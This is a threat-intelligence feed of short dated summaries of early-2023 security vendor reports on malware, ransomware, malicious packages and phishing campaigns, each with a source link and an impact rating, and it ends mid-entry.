AsyncRAT_Leveraging_Windows_Help_File
LOW
+
Intel Source:
ASEC
Intel Name:
AsyncRAT_Leveraging_Windows_Help_File
Date of Scan:
2023-02-13
Impact:
LOW
Summary:
ASEC researchers have identified that AsyncRAT is being distributed as a Windows help file (*.chm).
Source: https://asec.ahnlab.com/en/47525/
2023-02-13
Website_posing_as_Naver_login_page
LOW
Intel Source:
ASEC
Intel Name:
Website_posing_as_Naver_login_page
Date of Scan:
2023-02-13
Impact:
LOW
Summary:
ASEC researchers have observed a situation where a fake Kakao login page is used to steal the account credentials of certain individuals.
Source: https://asec.ahnlab.com/en/47530/
2023-02-13
Malicious_Npm_Package_Using_Typosquatting_to_Download_Malware
LOW
Intel Source:
Reversing Labs
Intel Name:
Malicious_Npm_Package_Using_Typosquatting_to_Download_Malware
Date of Scan:
2023-02-13
Impact:
LOW
Summary:
Reversing Labs researchers have observed a package called “aabquerys” on the open-source JavaScript npm repository that uses typosquatting techniques to enable the download of malicious components.
Source: https://www.reversinglabs.com/blog/open-source-malware-sows-havoc-on-supply-chain
2023-02-13
Hackers_From_Dalbit_Group_Targeting_Vulnerable_Korean_Company_Servers
LOW
Intel Source:
ASEC
Intel Name:
Hackers_From_Dalbit_Group_Targeting_Vulnerable_Korean_Company_Servers
Date of Scan:
2023-02-13
Impact:
LOW
Summary:
ASEC researchers have identified that the Chinese threat actor group named Dalbit (m00nlight) is targeting vulnerable Korean company servers. Also, this group uses publicly available tools, from the WebShell used in the early stages to the ransomware used at the end.
Source: https://asec.ahnlab.com/en/47455/
2023-02-12
DPRK_Malicious_Cyber_Activities
MEDIUM
Intel Source:
CISA
Intel Name:
DPRK_Malicious_Cyber_Activities
Date of Scan:
2023-02-12
Impact:
MEDIUM
Summary:
This cybersecurity advisory provides an overview of Democratic People’s Republic of Korea (DPRK) state-sponsored ransomware and the TTPs and IOCs DPRK cyber actors have used to gain access to and conduct ransomware attacks against Healthcare and Public Health (HPH) Sector organizations and other critical infrastructure sector entities, as well as DPRK cyber actors’ use of cryptocurrency to demand ransoms.
Source: https://www.cisa.gov/uscert/ncas/alerts/aa23-040a
2023-02-10
Hackers_Leveraging_HTML_Smuggling_to_Deliver_Malware
LOW
Intel Source:
SpiderLabs Blog
Intel Name:
Hackers_Leveraging_HTML_Smuggling_to_Deliver_Malware
Date of Scan:
2023-02-10
Impact:
LOW
Summary:
SpiderLabs researchers have analyzed some notable malware strains that have utilized HTML smuggling in their infection chain and provided a brief analysis of each malware.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/html-smuggling-the-hidden-threat-in-your-inbox/
2023-02-10
Malicious_Google_Ads_Targeting_AWS_Login
LOW
Intel Source:
Sentinelone
Intel Name:
Malicious_Google_Ads_Targeting_AWS_Login
Date of Scan:
2023-02-10
Impact:
LOW
Summary:
SentinelOne researchers have identified a new phishing campaign targeting Amazon Web Services (AWS) logins that abuses Google Ads to sneak phishing sites into Google Search results and steal login credentials.
Source: https://www.sentinelone.com/blog/cloud-credentials-phishing-malicious-google-ads-target-aws-logins/
2023-02-10
Ransomware_Attac_on_Critical_Infrastructure_Funded_by_DPRK
LOW
Intel Source:
CISA
Intel Name:
Ransomware_Attac_on_Critical_Infrastructure_Funded_by_DPRK
Date of Scan:
2023-02-10
Impact:
LOW
Summary:
CISA researchers have identified the TTPs and IOCs DPRK cyber actors use to gain access to and conduct ransomware attacks against Healthcare and Public Health Sector organizations and other critical infrastructure sector entities, as well as DPRK cyber actors’ use of cryptocurrency to demand ransoms.
Source: https://www.cisa.gov/uscert/ncas/alerts/aa23-040a
2023-02-09
The_malware_attacks_distributed_by_SteelClove_group
LOW
Intel Source:
NTT Security
Intel Name:
The_malware_attacks_distributed_by_SteelClove_group
Date of Scan:
2023-02-09
Impact:
LOW
Summary:
The NTT Security SOC team shared the latest tactics used by SteelClover among the most recently observed cases of malware distribution via Google Ads. SteelClover is a financially motivated attack group that has been active since 2019.
Source: https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle
2023-02-09
GootLoader_Leveraging_SEO_Poisoning_Techniques
LOW
Intel Source:
Cybereason
Intel Name:
GootLoader_Leveraging_SEO_Poisoning_Techniques
Date of Scan:
2023-02-09
Impact:
LOW
Summary:
Cybereason researchers have investigated an incident that involved new deployment methods of the GootLoader malware loader through heavily-obfuscated JavaScript files.
Source: https://www.cybereason.com/blog/threat-alert-gootloader-seo-poisoning-and-large-payloads-leading-to-compromise https://www.cybereason.com/hubfs/THREAT%20ALERT%20GootLoader%20-%20Large%20payload%20leading%20to%20compromise%20(BLOG).pdf
2023-02-09
A_Backdoor_with_Smart_Screenshot_Capability
LOW
Intel Source:
ISC.SANS
Intel Name:
A_Backdoor_with_Smart_Screenshot_Capability
Date of Scan:
2023-02-09
Impact:
LOW
Summary:
Researchers from SANS have observed that backdoors and trojans implement screenshot capabilities to “see” what is displayed on the victim’s computer, and analyzed a sample that takes screenshots in Python.
Source: https://isc.sans.edu/diary/rss/29534
2023-02-09
Analysis_of_ESXiArgs_Ransomware
LOW
Intel Source:
SecuInfra
Intel Name:
Analysis_of_ESXiArgs_Ransomware
Date of Scan:
2023-02-09
Impact:
LOW
Summary:
In their post, SecuInfra analysts analyze the recent “ESXiArgs” ransomware variant, which spread to a large number of outdated, internet-exposed ESXi servers around the world.
Source: https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/
2023-02-09
The_distribution_of_Quasar_RAT
LOW
Intel Source:
ASEC
Intel Name:
The_distribution_of_Quasar_RAT
Date of Scan:
2023-02-09
Impact:
LOW
Summary:
The ASEC analysis team discovered Quasar RAT malware being distributed through a private Home Trading System (HTS). It is assumed that the victims did not install their HTS from an institutional financial company, but instead obtained HPlus HTS from an unsanctioned source or a disguised financial investment company. Quasar is a RAT that allows threat actors to gain control over infected systems to steal information or perform other malicious behaviors.
Source: https://asec.ahnlab.com/en/47283/
2023-02-09
Malicious_aptX_Python_Package_Drops_Meterpreter_Shell
LOW
Intel Source:
Sonatype
Intel Name:
Malicious_aptX_Python_Package_Drops_Meterpreter_Shell
Date of Scan:
2023-02-09
Impact:
LOW
Summary:
Researchers from Sonatype have identified malicious Python packages on the PyPI software registry that carry out a range of malicious activities.
Source: https://blog.sonatype.com/malicious-aptx-python-package-drops-meterpreter-shell-deletes-netstat
2023-02-09
Hackers_From_NewsPenguin_Targeting_Pakistani_Entities
LOW
Intel Source:
Blackberry
Intel Name:
Hackers_From_NewsPenguin_Targeting_Pakistani_Entities
Date of Scan:
2023-02-09
Impact:
LOW
Summary:
BlackBerry researchers have identified a previously unknown threat actor, dubbed NewsPenguin, linked to a phishing campaign targeting Pakistani entities by leveraging the upcoming international maritime expo as a lure.
Source: https://blogs.blackberry.com/en/2023/02/newspenguin-a-previously-unknown-threat-actor-targets-pakistan-with-advanced-espionage-tool
2023-02-09
New_Russian_Information_Stealing_Malware_Graphiron
MEDIUM
Intel Source:
Symantec
Intel Name:
New_Russian_Information_Stealing_Malware_Graphiron
Date of Scan:
2023-02-09
Impact:
MEDIUM
Summary:
The Russian Nodaria espionage group (aka UAC-0056) is using a new piece of information-stealing malware against targets in Ukraine. The malware (Infostealer.Graphiron) is written in Go and is meant to collect a wide range of information from the infected computer, including system information, credentials, screenshots, and files.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nodaria-ukraine-infostealer
2023-02-08
Cl0p_Ransomware_Targets_Linux_Systems
LOW
Intel Source:
Sentinelone
Intel Name:
Cl0p_Ransomware_Targets_Linux_Systems
Date of Scan:
2023-02-08
Impact:
LOW
Summary:
Researchers from SentinelOne have observed the first ELF variant of Cl0p (also known as Clop) ransomware targeting Linux systems. The new variant is similar to the Windows variant, using the same encryption method and similar process logic.
Source: https://www.sentinelone.com/labs/cl0p-ransomware-targets-linux-systems-with-flawed-encryption-decryptor-available/
2023-02-08
Royal_Ransomware_Targeting_VMware_ESXi_Servers_in_Linux_Devices
LOW
Intel Source:
Equinix Threat Analysis Center
Intel Name:
Royal_Ransomware_Targeting_VMware_ESXi_Servers_in_Linux_Devices
Date of Scan:
2023-02-08
Impact:
LOW
Summary:
Researchers from Equinix Threat Analysis Center (ETAC) have identified that Royal ransomware has updated its techniques for encrypting Linux devices, specifically targeting VMware ESXi virtual machines.
Source: https://twitter.com/BushidoToken/status/1621087221905514496
2023-02-08
Magniber_Ransomware_Distributing_Again_in_Korea
LOW
Intel Source:
ASEC
Intel Name:
Magniber_Ransomware_Distributing_Again_in_Korea
Date of Scan:
2023-02-08
Impact:
LOW
Summary:
ASEC researchers have discovered the redistribution of Magniber disguised as normal Windows Installers (MSI). The distributed Magniber files have MSI as their extensions, disguising themselves as Windows update files.
Source: https://asec.ahnlab.com/en/47287/
2023-02-08
Hackers_Targeting_State_Bodies_of_Ukraine
MEDIUM
Intel Source:
CERT-UA
Intel Name:
Hackers_Targeting_State_Bodies_of_Ukraine
Date of Scan:
2023-02-08
Impact:
MEDIUM
Summary:
CERT-UA researchers have identified the mass distribution of e-mails with an attachment in the form of a RAR archive named "court letter, information on debt.rar."
Source: https://cert.gov.ua/article/3804703
2023-02-08
Earth_Zhulong_Threat_Group_Targeting_Vietnam_Telecom_and_Media_Sector
MEDIUM
Intel Source:
TrendMicro
Intel Name:
Earth_Zhulong_Threat_Group_Targeting_Vietnam_Telecom_and_Media_Sector
Date of Scan:
2023-02-08
Impact:
MEDIUM
Summary:
TrendMicro researchers have discovered a new hacking group that is targeting Vietnam's telecom, technology, and media sectors. The group, dubbed Earth Zhulong, is related to the China-linked hacking group 1937CN based on similar code in the custom shellcode loader and on victimology.
Source: https://www.trendmicro.com/en_us/research/23/b/earth-zhulong-familiar-patterns-target-vietnam.html
2023-02-08
ASEC_Weekly_Malware_samples_January_30th_to_February_5th_2023
LOW
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Malware_samples_January_30th_to_February_5th_2023
Date of Scan:
2023-02-08
Impact:
LOW
Summary:
The ASEC analysis team continues its weekly monitoring of collected malware samples, here for January 30 - February 5, 2023. The top malware families for this week are SmokeLoader, BeamWinHTTP, Formbook, Quasar RAT and Redline.
Source: https://asec.ahnlab.com/en/47330/
2023-02-08
Newly_Threat_Actor_TA866_Distributing_Malware_via_Email
MEDIUM
Intel Source:
Proofpoint
Intel Name:
Newly_Threat_Actor_TA866_Distributing_Malware_via_Email
Date of Scan:
2023-02-08
Impact:
MEDIUM
Summary:
Researchers from Proofpoint have observed a cluster of evolving financially motivated activity which they are referring to as "Screentime". The attack chain starts with an email containing a malicious attachment or URL and leads to malware that Proofpoint dubbed WasabiSeed and Screenshotter.
Source: https://www.proofpoint.com/us/blog/threat-insight/screentime-sometimes-it-feels-like-somebodys-watching-me
2023-02-08
Ransomware_Attacks_Targeting_VMware_ESXi_Servers
LOW
Intel Source:
Cyble
Intel Name:
Ransomware_Attacks_Targeting_VMware_ESXi_Servers
Date of Scan:
2023-02-08
Impact:
LOW
Summary:
Cyble researchers have identified a ransomware attack targeting VMware ESXi servers to deploy ESXiArgs ransomware.
Source: https://blog.cyble.com/2023/02/06/massive-ransomware-attack-targets-vmware-esxi-servers/
2023-02-07
The_Trigona_ransomware_variant
MEDIUM
Intel Source:
Fortinet
Intel Name:
The_Trigona_ransomware_variant
Date of Scan:
2023-02-07
Impact:
MEDIUM
Summary:
FortiGuard Labs compiled a report on Trigona ransomware with details and insights into this part of the ransomware landscape and protections against these variants.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-trigona-ransomware
2023-02-07
New_Medusa_Botnet_targeting_Linux_Users
MEDIUM
Intel Source:
Cyble
Intel Name:
New_Medusa_Botnet_targeting_Linux_Users
Date of Scan:
2023-02-07
Impact:
MEDIUM
Summary:
Cyble Research and Intelligence Labs has been monitoring the actions and behavior of MiraiBot, a botnet capable of performing DDoS, ransomware, and brute-force attacks.
Source: https://blog.cyble.com/2023/02/03/new-medusa-botnet-emerging-via-mirai-botnet-targeting-linux-users/
2023-02-07
The_cases_of_threat_actors_using_Sliver_malware
LOW
Intel Source:
ASEC
Intel Name:
The_cases_of_threat_actors_using_Sliver_malware
Date of Scan:
2023-02-07
Impact:
LOW
Summary:
This ASEC blog describes recent cases of threat actors using Sliver in addition to Cobalt Strike and Metasploit. The ASEC (AhnLab Security Emergency response Center) analysis team keeps an eye on attacks against systems with either unpatched vulnerabilities or misconfigured settings. They recently discovered a Sliver backdoor being installed through what is presumed to be exploitation of a vulnerability in certain software.
Source: https://asec.ahnlab.com/en/47088/
2023-02-07
Observed_intrusion_used_AutoHotkey_to_launch_a_keylogger
LOW
Intel Source:
The DFIR Report
Intel Name:
Observed_intrusion_used_AutoHotkey_to_launch_a_keylogger
Date of Scan:
2023-02-07
Impact:
LOW
Summary:
The DFIR Report team observed a compromise that began with a Word document containing a malicious VBA macro, which established persistence and communication with a command and control (C2) server. During initial discovery and user enumeration, the threat actor used AutoHotkey to launch a keylogger.
Source: https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/
2023-02-07
Analysis_of_the_AveMaria_infostealer_attack_chain
LOW
Intel Source:
Zscaler
Intel Name:
Analysis_of_the_AveMaria_infostealer_attack_chain
Date of Scan:
2023-02-07
Impact:
LOW
Summary:
Zscaler’s ThreatLabz research team closely monitors and tracks active threat campaigns. In their report they provided seven case studies that give an in-depth analysis of the AveMaria infostealer attack chain and how it has shifted over the past six months.
Source: https://www.zscaler.com/blogs/security-research/dynamic-approaches-seen-avemarias-distribution-strategy
2023-02-07
Hackers_backdoor_Windows_Devices_in_Sliver_and_BYOVD_Attacks
LOW
Intel Source:
ASEC
Intel Name:
Hackers_backdoor_Windows_Devices_in_Sliver_and_BYOVD_Attacks
Date of Scan:
2023-02-07
Impact:
LOW
Summary:
ASEC researchers have identified a new hacking campaign that exploits Sunlogin flaws to deploy the Sliver post-exploitation toolkit and launch Windows Bring Your Own Vulnerable Driver (BYOVD) attacks to disable security software.
Source: https://asec.ahnlab.com/en/47088/
2023-02-07
Active_IOCs_of_Trickbot_Malware
MEDIUM
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_Trickbot_Malware
Date of Scan:
2023-02-07
Impact:
MEDIUM
Summary:
Researchers from Rewterz have identified the active IOCs of Trickbot malware. It has been operating since 2016. It is primarily distributed through phishing campaigns and is known for its ability to steal sensitive information such as login credentials, financial information, and personal data.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-trickbot-malware-active-iocs-30
2023-02-06
ASEC_Weekly_Malware_samples_January_23_29th_2023
LOW
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Malware_samples_January_23_29th_2023
Date of Scan:
2023-02-06
Impact:
LOW
Summary:
The ASEC analysis team continues its weekly monitoring of collected malware samples, here for January 23-29, 2023. The top malware families for this week are SmokeLoader, BeamWinHTTP, Formbook, AgentTesla and SnakeKeylogger.
Source: https://asec.ahnlab.com/en/47011/
2023-02-06
The_Gambling_Industry_is_targeted_by_Ice_Breaker_Operation
LOW
Intel Source:
Security Joes
Intel Name:
The_Gambling_Industry_is_targeted_by_Ice_Breaker_Operation
Date of Scan:
2023-02-06
Impact:
LOW
Summary:
In September of last year, Security Joes IRT was informed about an incident involving an attempt to socially engineer an online customer service platform. Due to custom-built rules and extensive employee awareness training, Security Joes IRT was able to push back these threats. They are tracking the new threat actor as Ice Breaker APT. Although research is still ongoing, the team is sharing this article to reveal the attacker's modus operandi, attack chain, ways to mitigate the threat, and supporting IOCs, TTPs and Yara rules.
Source: https://www.securityjoes.com/post/operation-ice-breaker-targets-the-gam-bl-ing-industry-right-before-it-s-biggest-gathering
2023-02-06
Hackers_Leveraging_Microsoft_Visual_Studio_Add_Ins_to_Push_Malware
LOW
Intel Source:
Deep Instinct
Intel Name:
Hackers_Leveraging_Microsoft_Visual_Studio_Add_Ins_to_Push_Malware
Date of Scan:
2023-02-06
Impact:
LOW
Summary:
Deep Instinct researchers have observed that hackers are increasingly using Microsoft Visual Studio Tools for Office (VSTO) as a method to achieve persistence and execute code on a target machine via malicious Office add-ins.
Source: https://www.deepinstinct.com/blog/no-macro-no-worries-vsto-being-weaponized-by-threat-actors
2023-02-06
Supply_Chain_Attack_by_New_Malicious_Python_Package_web3_essential
MEDIUM
Intel Source:
Fortinet
Intel Name:
Supply_Chain_Attack_by_New_Malicious_Python_Package_web3_essential
Date of Scan:
2023-02-06
Impact:
MEDIUM
Summary:
Fortinet researchers have discovered another new 0-day attack in a Python Package Index (PyPI) package called web3-essential. The package includes malicious code in its setup.py installation script that downloads and runs an executable file as part of its installation.
Source: https://www.fortinet.com/blog/threat-research/supply-chain-attack-by-new-malicious-python-package-web3-essential?&web_view=true
2023-02-05
The_Details_Examination_of_Malware_Technique
LOW
Intel Source:
Quickheal
Intel Name:
The_Details_Examination_of_Malware_Technique
Date of Scan:
2023-02-05
Impact:
LOW
Summary:
QuickHeal researchers have examined crucial steps in the attack chain, such as how the malware is able to obtain administrative privileges to make changes to the system.
Source: https://blogs.quickheal.com/uac-bypass-using-cmstp/
2023-02-05
New_BATLoader_Spreading_RATs_and_Stealers
LOW
Intel Source:
Cyble
Intel Name:
New_BATLoader_Spreading_RATs_and_Stealers
Date of Scan:
2023-02-05
Impact:
LOW
Summary:
Cyble researchers have observed a novel type of BAT loader being used to distribute a range of RAT and stealer malware families. This loader employs an innovative method to deliver the malicious payload to the user's system.
Source: https://blog.cyble.com/2023/02/02/new-batloader-disseminates-rats-and-stealers/
2023-02-04
Qakbot_Rising_with_New_Strategies
LOW
Intel Source:
Cyble
Intel Name:
Qakbot_Rising_with_New_Strategies
Date of Scan:
2023-02-04
Impact:
LOW
Summary:
Cyble researchers have identified that threat actors are leveraging Microsoft OneNote to infect users.
Source: https://blog.cyble.com/2023/02/01/qakbots-evolution-continues-with-new-strategies/
2023-02-04
DotNET_Malware_Loaders_aka_MalVirt_Distributing_Through_Malvertising_Attack
LOW
Intel Source:
Sentinelone
Intel Name:
DotNET_Malware_Loaders_aka_MalVirt_Distributing_Through_Malvertising_Attack
Date of Scan:
2023-02-04
Impact:
LOW
Summary:
SentinelOne researchers have observed a cluster of virtualized .NET malware loaders being distributed through malvertising attacks. The loaders, dubbed MalVirt, use obfuscated virtualization for anti-analysis and evasion, along with the Windows Process Explorer driver for terminating processes.
Source: https://www.sentinelone.com/labs/malvirt-net-virtualization-thrives-in-malvertising-attacks/
2023-02-04
Hackers_From_Korea_Exploiting_Unpatched_Zimbra_Devices
LOW
Intel Source:
WithSecure
Intel Name:
Hackers_From_Korea_Exploiting_Unpatched_Zimbra_Devices
Date of Scan:
2023-02-04
Impact:
LOW
Summary:
Researchers from WithSecure have identified a new intelligence-gathering campaign, linked to the prolific North Korean state-sponsored Lazarus Group, that leveraged known security flaws in unpatched Zimbra devices to compromise victim systems.
Source: https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf
2023-02-04
Mustang_Panda_APT_Group_Targeting_Europe_With_Spearphishing_Campaign
LOW
Intel Source:
Eclecticiq
Intel Name:
Mustang_Panda_APT_Group_Targeting_Europe_With_Spearphishing_Campaign
Date of Scan:
2023-02-04
Impact:
LOW
Summary:
EclecticIQ researchers have identified that the Mustang Panda APT group started targeting Europe with a new spearphishing campaign using a customized variant of the PlugX backdoor.
Source: https://blog.eclecticiq.com/mustang-panda-apt-group-uses-european-commission-themed-lure-to-deliver-plugx-malware
2023-02-03
HeadCrab_Malware_Compromising_Redis_Servers
LOW
Intel Source:
Aqua Blog
Intel Name:
HeadCrab_Malware_Compromising_Redis_Servers
Date of Scan:
2023-02-03
Impact:
LOW
Summary:
Aqua Security researchers have identified that around 1,200 Redis database servers worldwide have been corralled into a botnet by an elusive and severe threat dubbed HeadCrab since early September 2021.
Source: https://blog.aquasec.com/headcrab-attacks-servers-worldwide-with-novel-state-of-art-redis-malware
2023-02-03
Malicious_LNK_File_Disguising_as_a_Normal_HWP_Document
LOW
Intel Source:
ASEC
Intel Name:
Malicious_LNK_File_Disguising_as_a_Normal_HWP_Document
Date of Scan:
2023-02-03
Impact:
LOW
Summary:
ASEC researchers have discovered the distribution of a malicious LNK file disguised as a normal HWP document, along with a text file impersonating the National Tax Service.
Source: https://asec.ahnlab.com/en/46865/
2023-02-03
Hackers_From_APT34_Targeting_The_Middle_East
LOW
Intel Source:
TrendMicro
Intel Name:
Hackers_From_APT34_Targeting_The_Middle_East
Date of Scan:
2023-02-03
Impact:
LOW
Summary:
TrendMicro researchers have identified a suspicious executable that was dropped and executed on multiple machines. Upon investigation, it was linked to APT34, and its main goal is to steal users’ credentials. Even in the case of a password reset or change, the malware is capable of sending the new credentials to the threat actors.
Source: https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html
2023-02-02
Microsoft_OneNote_Documents_Delivering_Malware_via_Email
MEDIUM
Intel Source:
Proofpoint
Intel Name:
Microsoft_OneNote_Documents_Delivering_Malware_via_Email
Date of Scan:
2023-02-02
Impact:
MEDIUM
Summary:
Proofpoint researchers have identified an increase in threat actor use of OneNote documents to deliver malware via email to unsuspecting end-users in December 2022 and January 2023.
Source: https://www.proofpoint.com/us/blog/threat-insight/onenote-documents-increasingly-used-to-deliver-malware
2023-02-02
Remote_Desktop_Files_targeted_by_evasive_malware
MEDIUM
Intel Source:
Cyble
Intel Name:
Remote_Desktop_Files_targeted_by_evasive_malware
Date of Scan:
2023-02-02
Impact:
MEDIUM
Summary:
Cyble Research and Intelligence Labs (CRIL) discovered a new malware named ‘Vector Stealer’, which can steal .rdp files. Stealing these RDP files can enable threat actors to perform RDP hijacking, as the files contain details about the RDP session, including information needed for remote access.
Source: https://blog.cyble.com/2023/02/01/vector-stealer-a-gateway-for-rdp-hijacking/
2023-02-02
Active_IOCs_of_LockBit_Green
MEDIUM
Intel Source:
PRODAFT
Intel Name:
Active_IOCs_of_LockBit_Green
Date of Scan:
2023-02-02
Impact:
MEDIUM
Summary:
Researchers from Prodaft have identified that the LockBit ransomware team made a so-called "LockBit Green" version of their ransomware available.
Source: https://twitter.com/PRODAFT/status/1620066347073019905?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1620066347073019905%7Ctwgr%5E7ac44bdc778d9ee19e6e0bd4fc793c84a30904c8%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fsecurityaffairs.com%2F141666%2Fcyber-crime%2Flockbit-green-ransomware-variant.html
2023-02-02
The_Ministry_of_Foreign_Affairs_official_of_Ukraine_Web_Resource_Imitated
MEDIUM
Intel Source:
CERT-UA
Intel Name:
The_Ministry_of_Foreign_Affairs_official_of_Ukraine_Web_Resource_Imitated
Date of Scan:
2023-02-02
Impact:
MEDIUM
Summary:
CERT-UA researchers have discovered a web page imitating the official web resource of the Ministry of Foreign Affairs of Ukraine, which offers to download software for the detection of infected computers.
Source: https://cert.gov.ua/article/3761023
2023-02-02
The_track_of_tactics_of_the_threat_actor_PYTA27
LOW
Intel Source:
Checkmarx
Intel Name:
The_track_of_tactics_of_the_threat_actor_PYTA27
Date of Scan:
2023-02-02
Impact:
LOW
Summary:
In this blog, Checkmarx threat researchers analyzed the tactics of one attacker who has been distributing their packages for at least four months and shows no signs of stopping. This actor is tracked as PYTA27.
Source: https://checkmarx.com/blog/evolution-of-a-software-supply-chain-attacker/
2023-02-02
GuLoader_Encrypted_With_NSIS_Crypter
LOW
Intel Source:
PaloAlto
Intel Name:
GuLoader_Encrypted_With_NSIS_Crypter
Date of Scan:
2023-02-02
Impact:
LOW
Summary:
In their post, Unit 42 researchers discussed a machine learning pipeline and an analysis of a GuLoader downloader that has been encrypted with a Nullsoft Scriptable Install System (NSIS) crypter. NSIS is an open-source system for creating Windows installers.
Source: https://unit42.paloaltonetworks.com/malware-detection-accuracy/
2023-02-02
CoinMiners_Mining_Ethereum_Classic_Coins_attack_cases
LOW
Intel Source:
ASEC
Intel Name:
CoinMiners_Mining_Ethereum_Classic_Coins_attack_cases
Date of Scan:
2023-02-02
Impact:
LOW
Summary:
The ASEC analysis team is observing CoinMiners that target Korean and overseas users. The team has studied various types of CoinMiner attacks over multiple blog posts in the past. In this post they introduce recently discovered malware that mines Ethereum Classic coins.
Source: https://asec.ahnlab.com/en/46774/
2023-02-02
The_spread_of_Redline_Infostealer_Malware
MEDIUM
Intel Source:
Rapid7
Intel Name:
The_spread_of_Redline_Infostealer_Malware
Date of Scan:
2023-02-02
Impact:
MEDIUM
Summary:
Recently, Rapid7 discovered malicious actors using OneNote files to deliver malicious code. Rapid7 found a specific technique that used OneNote files containing batch scripts, which upon execution started an instance of a renamed PowerShell process to decrypt and execute a base64-encoded binary.
Source: https://www.rapid7.com/blog/post/2023/01/31/rapid7-observes-use-of-microsoft-onenote-to-spread-redline-infostealer-malware/
2023-02-01
TZW_Ransomware_Distributing_in_Korea
LOW
Intel Source:
ASEC
Intel Name:
TZW_Ransomware_Distributing_in_Korea
Date of Scan:
2023-02-01
Impact:
LOW
Summary:
ASEC researchers have discovered the distribution of the TZW ransomware, which encrypts files before adding the “TZW” file extension to the original extension.
Source: https://asec.ahnlab.com/en/46812/
2023-02-01
The_Similarities_Between_Abraham_s_Ax_and_Moses_Staff_Group
LOW
Intel Source:
Secureworks
Intel Name:
The_Similarities_Between_Abraham_s_Ax_and_Moses_Staff_Group
Date of Scan:
2023-02-01
Impact:
LOW
Summary:
Researchers from SecureWorks have analyzed the similarities between the Moses Staff hacktivist group persona that emerged in September 2021 and the Abraham's Ax persona that emerged in November 2022.
Source: https://www.secureworks.com/blog/abrahams-ax-likely-linked-to-moses-staff
2023-02-01
New_Version_of_Nevada_Ransomware
MEDIUM
Intel Source:
Resecurity
Intel Name:
New_Version_of_Nevada_Ransomware
Date of Scan:
2023-02-01
Impact:
MEDIUM
Summary:
Resecurity researchers have identified a new version of Nevada Ransomware which recently emerged on the Dark Web right before the start of 2023. The actors behind this new project have an affiliate platform first introduced on the RAMP underground community, which is known for initial access brokers (IABs) and other cybercriminal actors and ransomware groups.
Source: https://resecurity.com/blog/article/nevada-ransomware-waiting-for-the-next-dark-web-jackpot
2023-02-01
LockBit_s_new_Black_variant_attack
MEDIUM
Intel Source:
Quickheal
Intel Name:
LockBit_s_new_Black_variant_attack
Date of Scan:
2023-02-01
Impact:
MEDIUM
Summary:
The Quickheal team investigated and analyzed LockBit’s new Black variant attack. They determined that the new LockBit 3.0 variant has a high infection vector and an attack chain exhibiting substantial anti-forensic activity. This variant is capable of clearing the event logs, killing multiple tasks, and deleting services simultaneously. It can also obtain initial access to the victim’s network via SMB brute forcing from various IPs.
Source: https://blogs.quickheal.com/uncovering-lockbit-blacks-attack-chain-and-anti-forensic-activity/
2023-02-01
An_ongoing_phishing_campaign_that_impersonates_Southwest_Airlines
LOW
Intel Source:
Inky
Intel Name:
An_ongoing_phishing_campaign_that_impersonates_Southwest_Airlines
Date of Scan:
2023-02-01
Impact:
LOW
Summary:
Last December, INKY observed and detected an ongoing phishing campaign that impersonates Southwest Airlines. Phishing emails are being sent from newly created domains, set up explicitly for these attacks.
Source: https://www.inky.com/en/blog/fresh-phish-southwests-flying-phish-takes-off-with-your-credentials
2023-02-01
An_Email_Specific_Phishing_Page
LOW
Intel Source:
ASEC
Intel Name:
An_Email_Specific_Phishing_Page
Date of Scan:
2023-02-01
Impact:
LOW
Summary:
ASEC researchers have identified multiple phishing emails leading to a phishing page that changes its icon to reflect the mail account service entered by the user and warns that their account will be shut down, prompting them to click the ‘Reactivate Now’ link if they want their account kept active.
Source: https://asec.ahnlab.com/en/46786/
2023-02-01
The_Analysis_of_Cryptojacks_System_to_Mine_for_Monero_Crypto
LOW
Intel Source:
Fortinet
Intel Name:
The_Analysis_of_Cryptojacks_System_to_Mine_for_Monero_Crypto
Date of Scan:
2023-02-01
Impact:
LOW
Summary:
Fortinet researchers have analyzed crypto-miner software that is delivered via an Excel document and executed on the victim’s device.
Source: https://www.fortinet.com/blog/threat-research/malicious-code-cryptojacks-device-to-mine-for-monero-crypto?&web_view=true
2023-02-01
Phishing_Emails_Circulating_With_Requests_for_Product_Quotation
LOW
Intel Source:
ASEC
Intel Name:
Phishing_Emails_Circulating_With_Requests_for_Product_Quotation
Date of Scan:
2023-02-01
Impact:
LOW
Summary:
Researchers from ASEC have identified phishing emails with content related to requests for product quotations. These phishing emails are all disguised to seem as if they were sent by a manager with a high position, such as the team leader or department director of production companies or foundries, and carry .html and .htm attachments.
Source: https://asec.ahnlab.com/en/46199/
2023-02-01
Changes_in_the_IcedID_malware_strategy
MEDIUM
Intel Source:
Esentire
Intel Name:
Changes_in_the_IcedID_malware_strategy
Date of Scan:
2023-02-01
Impact:
MEDIUM
Summary:
In December 2022, the Esentire threat intel team observed IcedID infections that were traced to payloads downloaded by users from the Internet. This observation matched a general uptick in successful IcedID infections in Q4 of 2022, which accounted for 35% of IcedID incidents for the period between January 2022 and January 2023. The observed IcedID infections originated exclusively via drive-by attacks, specifically Google Search Ads targeting common applications.
Source: https://www.esentire.com/blog/icedid-malware-shifts-its-delivery-strategy
2023-02-01
Google_Ads_Targeting_Password_Manager
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Google_Ads_Targeting_Password_Manager
Date of Scan:
2023-02-01
Impact:
LOW
Summary:
Researchers from Malwarebytes have identified a new malvertising campaign that makes use of Google Ads to target users looking for password managers.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/01/google-sponsored-ads-malvertising-targets-password-manager
2023-02-01
Malware_Packer_TrickGate_Using_by_Several_Malware_to_Evade_Detection
LOW
+
Intel Source:
Checkpoint
Intel Name:
Malware_Packer_TrickGate_Using_by_Several_Malware_to_Evade_Detection
Date of Scan:
2023-02-01
Impact:
LOW
Summary:
